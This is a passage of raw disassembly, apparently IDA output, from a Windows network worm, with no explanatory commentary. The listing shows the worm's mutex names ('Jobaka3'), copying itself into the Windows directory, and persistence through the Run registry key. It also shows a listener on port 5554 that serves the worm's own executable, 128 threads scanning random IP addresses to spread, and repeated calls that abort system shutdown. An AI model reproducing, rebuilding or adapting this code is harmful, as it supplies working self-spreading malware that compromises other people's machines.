push ds:off_4068E4
push ebx
call esi ; send
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401DB9
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_28], 2
push edi
call ds:dword_4050F4 ; htons
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call ds:dword_4050F8 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401DB9
lea eax, [ebp+var_28]
push 10h
push eax
push ebx
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401D44
push ebx
call ds:dword_40511C ; closesocket
jmp short loc_401DB9
; ---------------------------------------------------------------------------
loc_401D44: ; CODE XREF: sub_401B08+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call ds:dword_405030 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401DB9
lea eax, [ebp+var_2]
push offset dword_406F38
push eax
call sub_402720
mov ebx, ds:dword_40502C
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401D8E: ; CODE XREF: sub_401B08+2A6�j
call ebx ; _hread
cmp eax, 1
jnz short loc_401DB0
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; send
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401D8E
; ---------------------------------------------------------------------------
loc_401DB0: ; CODE XREF: sub_401B08+28B�j
push [ebp+var_8]
call ds:dword_40501C ; _lclose
loc_401DB9: ; CODE XREF: sub_401B08+1DD�j
; sub_401B08+21B�j ...
push [ebp+var_C]
call ds:dword_40511C ; closesocket
push 0
push ds:off_4068DC
call sub_402210
pop ecx
push eax
push ds:off_4068DC
loc_401DD7: ; CODE XREF: sub_401B08+197�j
push [ebp+arg_0]
jmp short loc_401E12
; ---------------------------------------------------------------------------
loc_401DDC: ; CODE XREF: sub_401B08+1B1�j
lea eax, [ebp+var_4E4]
push offset aQuit ; "QUIT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401DFC
push ebx
call ds:dword_40511C ; closesocket
jmp short loc_401E14
; ---------------------------------------------------------------------------
loc_401DFC: ; CODE XREF: sub_401B08+2E9�j
push 0
push ds:off_4068DC
call sub_402210
pop ecx
push eax
push ds:off_4068DC
loc_401E11: ; CODE XREF: sub_401B08+8A�j
; sub_401B08+BB�j
push ebx
loc_401E12: ; CODE XREF: sub_401B08+2D2�j
call esi ; send
loc_401E14: ; CODE XREF: sub_401B08+2F2�j
cmp [ebp+var_10], 0
jg loc_401B43
push [ebp+arg_0]
call ds:dword_40511C ; closesocket
pop edi
pop esi
loc_401E29: ; CODE XREF: sub_401B08+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B08 endp
; =============== S U B R O U T I N E =======================================
sub_401E30 proc near ; CODE XREF: sub_401B08+119�p
; sub_401B08+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E38: ; CODE XREF: sub_401E30+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E42
cmp al, 9
jnz short loc_401E45
loc_401E42: ; CODE XREF: sub_401E30+C�j
inc esi
jmp short loc_401E38
; ---------------------------------------------------------------------------
loc_401E45: ; CODE XREF: sub_401E30+10�j
; sub_401E30+2E�j
movsx eax, byte ptr [esi]
push eax
call sub_402810
test eax, eax
pop ecx
jz short loc_401E60
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401E45
; ---------------------------------------------------------------------------
loc_401E60: ; CODE XREF: sub_401E30+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E65 proc near ; DATA XREF: sub_402029+79�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call ds:dword_4050F8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401E89
loc_401E81: ; CODE XREF: sub_401E65+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401E89: ; CODE XREF: sub_401E65+1A�j
push 15B2h
mov [ebp+var_14], 2
call ds:dword_4050F4 ; htons
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call ds:dword_405118 ; bind
cmp eax, 0FFFFFFFFh
jz short loc_401EC1
push 5
push edi
call ds:dword_405100 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_401ECA
loc_401EC1: ; CODE XREF: sub_401E65+4C�j
push edi
call ds:dword_40511C ; closesocket
jmp short loc_401E81
; ---------------------------------------------------------------------------
loc_401ECA: ; CODE XREF: sub_401E65+5A�j
; sub_401E65+89�j
push esi
push esi
push edi
call ds:dword_4050E8 ; accept
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B08
push esi
push esi
call ds:dword_405038 ; CreateThread
push 19h
call ds:dword_405028 ; Sleep
jmp short loc_401ECA
sub_401E65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401EF0 proc near ; DATA XREF: sub_402029+8D�o
var_454 = byte ptr -454h
var_438 = byte ptr -438h
var_400 = byte ptr -400h
sub esp, 454h
push ebx
push ebp
mov ebp, ds:dword_4050E0
push esi
push edi
mov esi, 0FFh
loc_401F05: ; CODE XREF: sub_401EF0+134�j
lea eax, [esp+464h+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+464h+var_438]
push eax
call ds:dword_40510C ; inet_addr
movsx edi, al
test edi, edi
movsx ebx, ah
jge short loc_401F2B
add edi, 100h
loc_401F2B: ; CODE XREF: sub_401EF0+33�j
test ebx, ebx
jge short loc_401F35
add ebx, 100h
loc_401F35: ; CODE XREF: sub_401EF0+3D�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F92
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F78
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_401F8F
; ---------------------------------------------------------------------------
loc_401F78: ; CODE XREF: sub_401EF0+63�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push ebx
loc_401F8F: ; CODE XREF: sub_401EF0+86�j
push edi
jmp short loc_401FBE
; ---------------------------------------------------------------------------
loc_401F92: ; CODE XREF: sub_401EF0+53�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_401FBE: ; CODE XREF: sub_401EF0+A0�j
lea eax, [esp+474h+var_454]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call ebp ; wsprintfA
add esp, 18h
lea eax, [esp+464h+var_454]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_40201C
lea eax, [esp+464h+var_400]
push 400h
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
lea eax, [esp+464h+var_400]
push offset asc_406A7C ; " "
push eax
call sub_402730
lea eax, [esp+46Ch+var_454]
push eax
lea eax, [esp+470h+var_400]
push eax
call sub_402730
add esp, 10h
lea eax, [esp+464h+var_400]
push 0
push eax
call ds:dword_40503C ; WinExec
loc_40201C: ; CODE XREF: sub_401EF0+EA�j
push 19h
call ds:dword_405028 ; Sleep
jmp loc_401F05
sub_401EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402029 proc near ; CODE XREF: sub_40283E+C9�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, ds:dword_405048
xor esi, esi
push offset aJobaka3 ; "Jobaka3"
push esi
push esi
call edi ; CreateMutexA
call ds:dword_405044 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+arg_8]
call sub_402210
pop ecx
test eax, eax
pop ecx
jbe short loc_402072
push [ebp+arg_8]
call sub_401A84
pop ecx
push 1
pop eax
loc_40206C: ; CODE XREF: sub_402029+6A�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_402072: ; CODE XREF: sub_402029+35�j
push 1
call sub_4020D7
mov [esp+14h+var_14], offset aJumpallsnlstil ; "JumpallsNlsTillt"
push esi
push esi
call edi ; CreateMutexA
call ds:dword_405040 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402095
xor eax, eax
jmp short loc_40206C
; ---------------------------------------------------------------------------
loc_402095: ; CODE XREF: sub_402029+66�j
mov edi, ds:dword_405038
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401E65
push esi
push esi
call edi ; CreateThread
mov ebx, 80h
loc_4020B0: ; CODE XREF: sub_402029+97�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401EF0
push esi
push esi
call edi ; CreateThread
dec ebx
jnz short loc_4020B0
pop ebx
loc_4020C3: ; CODE XREF: sub_402029+AC�j
push esi
call ds:dword_405000 ; AbortSystemShutdownA
push 0BB8h
call ds:dword_405028 ; Sleep
jmp short loc_4020C3
sub_402029 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020D7 proc near ; CODE XREF: sub_402029+4B�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
var_424 = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
lea eax, [ebp+var_824]
push esi
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_424]
push esi
push eax
call ds:dword_405050 ; GetWindowsDirectoryA
lea eax, [ebp+var_424]
push eax
call sub_402210
cmp [ebp+eax+var_425], 5Ch
pop ecx
pop esi
jz short loc_40212F
lea eax, [ebp+var_424]
push offset asc_406ACC ; "\\"
push eax
call sub_402730
pop ecx
pop ecx
loc_40212F: ; CODE XREF: sub_4020D7+43�j
push ds:off_4068C8
lea eax, [ebp+var_424]
push eax
call sub_402730
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_40215F
lea eax, [ebp+var_424]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call ds:dword_40504C ; CopyFileA
loc_40215F: ; CODE XREF: sub_4020D7+70�j
lea eax, [ebp+var_4]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call ds:dword_405004 ; RegOpenKeyA
lea eax, [ebp+var_424]
push eax
call sub_402210
pop ecx
push eax
lea eax, [ebp+var_424]
push eax
push 1
push 0
push ds:off_4068C8
push [ebp+var_4]
call ds:dword_405008 ; RegSetValueExA
push [ebp+var_4]
call ds:dword_40500C ; RegCloseKey
leave
retn
sub_4020D7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4021B0 proc near ; CODE XREF: sub_401153+10�p
; sub_401153+40�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_402203
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4021F7
neg ecx
and ecx, 3
jz short loc_4021D9
sub edx, ecx
loc_4021D3: ; CODE XREF: sub_4021B0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4021D3
loc_4021D9: ; CODE XREF: sub_4021B0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4021F7
rep stosd
test edx, edx
jz short loc_4021FD
loc_4021F7: ; CODE XREF: sub_4021B0+18�j
; sub_4021B0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4021F7
loc_4021FD: ; CODE XREF: sub_4021B0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402203: ; CODE XREF: sub_4021B0+A�j
mov eax, [esp+arg_0]
retn
sub_4021B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402210 proc near ; CODE XREF: sub_401210+3E�p
; sub_401210+55�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_402230
loc_40221C: ; CODE XREF: sub_402210+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_402263
test ecx, 3
jnz short loc_40221C
add eax, 0
loc_402230: ; CODE XREF: sub_402210+A�j
; sub_402210+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_402230
mov eax, [ecx-4]
test al, al
jz short loc_402281
test ah, ah
jz short loc_402277
test eax, 0FF0000h
jz short loc_40226D
test eax, 0FF000000h
jz short loc_402263
jmp short loc_402230
; ---------------------------------------------------------------------------
loc_402263: ; CODE XREF: sub_402210+11�j
; sub_402210+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40226D: ; CODE XREF: sub_402210+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402277: ; CODE XREF: sub_402210+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402281: ; CODE XREF: sub_402210+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_402210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402290 proc near ; CODE XREF: sub_401398+59�p
; sub_401398+78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4022B0
cmp edi, eax
jb loc_402428
loc_4022B0: ; CODE XREF: sub_402290+16�j
test edi, 3
jnz short loc_4022CC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
loc_4022CC: ; CODE XREF: sub_402290+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4022E4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_4022EC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4022E4: ; CODE XREF: sub_402290+46�j
jmp dword ptr ds:loc_4023E8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4022EC: ; CODE XREF: sub_402290+31�j
; sub_402290+8E�j ...
jmp ds:off_40236C[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset loc_402300
dd offset loc_40232C
; ---------------------------------------------------------------------------
push eax
and eax, [eax+0]
loc_402300: ; DATA XREF: sub_402290+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40232C: ; DATA XREF: sub_402290+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40236C dd offset loc_4023CF ; DATA XREF: sub_402290:loc_4022EC�r
dd offset loc_4023BC
dd offset loc_4023B4
dd offset loc_4023AC
dd offset loc_4023A4
dd offset loc_40239C
dd offset loc_402394
dd offset loc_40238C
; ---------------------------------------------------------------------------
loc_40238C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_402394: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40239C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4023A4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4023AC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4023B4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4023BC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4023CF: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290:off_40236C�o
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4023D8 dd offset loc_4023E8 ; DATA XREF: sub_402290+35�r
; sub_402290+92�r ...
dd offset loc_4023F0
dd offset loc_4023FC
dd offset loc_402410
; ---------------------------------------------------------------------------
loc_4023E8: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4023F0: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4023FC: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_402410: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402428: ; CODE XREF: sub_402290+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40245C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_402450: ; CODE XREF: sub_402290+1B1�j
; sub_402290+208�j ...
neg ecx
jmp ds:off_402520[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40245C: ; CODE XREF: sub_402290+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_402474
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_402474+4[eax*4]
; ---------------------------------------------------------------------------
loc_402474: ; CODE XREF: sub_402290+1D6�j
; DATA XREF: sub_402290+1DD�r
jmp ds:off_402570[ecx*4]
; ---------------------------------------------------------------------------
align 4
mov [eax+eax*2], ah
add [eax-2FFFBFDCh], ch
and al, 40h
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_402524
dd offset loc_40252C
dd offset loc_402534
dd offset loc_40253C
dd offset loc_402544
dd offset loc_40254C
dd offset loc_402554
off_402520 dd offset loc_402567 ; DATA XREF: sub_402290+1C2�r
; ---------------------------------------------------------------------------
loc_402524: ; DATA XREF: sub_402290+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40252C: ; DATA XREF: sub_402290+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_402534: ; DATA XREF: sub_402290+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40253C: ; DATA XREF: sub_402290+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_402544: ; DATA XREF: sub_402290+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40254C: ; DATA XREF: sub_402290+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_402554: ; DATA XREF: sub_402290+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_402567: ; CODE XREF: sub_402290+1C2�j
; DATA XREF: sub_402290:off_402520�o
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_402570 dd offset loc_402580 ; DATA XREF: sub_402290+1B7�r
; sub_402290:loc_402474�r ...
dd offset loc_402588
dd offset loc_402598
dd offset loc_4025AC
; ---------------------------------------------------------------------------
loc_402580: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402588: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402598: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4025AC: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4025D0 proc near ; CODE XREF: sub_40159E+8�p
; sub_40371C+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4025F0
loc_4025DC: ; CODE XREF: sub_4025D0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4025DC
loc_4025F0: ; CODE XREF: sub_4025D0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4025D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402600 proc near ; CODE XREF: sub_401A84+2D�p
; sub_401A84+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40267A
mov dh, [ecx+1]
test dh, dh
jz short loc_402667
loc_402618: ; CODE XREF: sub_402600+52�j
; sub_402600+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_40263A
test al, al
jz short loc_402634
loc_402629: ; CODE XREF: sub_402600+32�j
mov al, [esi]
inc esi
loc_40262C: ; CODE XREF: sub_402600+3F�j
cmp al, dl
jz short loc_40263A
test al, al
jnz short loc_402629
loc_402634: ; CODE XREF: sub_402600+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40263A: ; CODE XREF: sub_402600+23�j
; sub_402600+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_40262C
lea edi, [esi-1]
loc_402644: ; CODE XREF: sub_402600+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_402673
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_402618
mov al, [ecx+3]
test al, al
jz short loc_402673
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_402644
jmp short loc_402618
; ---------------------------------------------------------------------------
loc_402667: ; CODE XREF: sub_402600+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp sub_402996
; ---------------------------------------------------------------------------
loc_402673: ; CODE XREF: sub_402600+49�j
; sub_402600+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_40267A: ; CODE XREF: sub_402600+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_402600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402680 proc near ; CODE XREF: sub_401B08+103�p
; sub_401B08+14C�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_402699: ; CODE XREF: sub_402680+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_402699
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4026C1
mov edx, ds:dword_406F3C
loc_4026C1: ; CODE XREF: sub_402680+39�j
; sub_402680+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_4026E1
test al, al
jz short loc_4026E1
inc edx
jmp short loc_4026C1
; ---------------------------------------------------------------------------
loc_4026E1: ; CODE XREF: sub_402680+58�j
; sub_402680+5C�j
mov ebx, edx
loc_4026E3: ; CODE XREF: sub_402680+81�j
mov al, [edx]
test al, al
jz short loc_402707
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_402703
inc edx
jmp short loc_4026E3
; ---------------------------------------------------------------------------
loc_402703: ; CODE XREF: sub_402680+7E�j
and byte ptr [edx], 0
inc edx
loc_402707: ; CODE XREF: sub_402680+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov ds:dword_406F3C, edx
and eax, ebx
pop ebx
leave
retn
sub_402680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402720 proc near ; CODE XREF: sub_401B08+E9�p
; sub_401B08+270�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_402791
sub_402720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402730 proc near ; CODE XREF: sub_401EF0+108�p
; sub_401EF0+117�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_40274C
loc_40273D: ; CODE XREF: sub_402730+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40277F
test ecx, 3
jnz short loc_40273D
loc_40274C: ; CODE XREF: sub_402730+B�j
; sub_402730+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40274C
mov eax, [ecx-4]
test al, al
jz short loc_40278E
test ah, ah
jz short loc_402789
test eax, 0FF0000h
jz short loc_402784
test eax, 0FF000000h
jz short loc_40277F
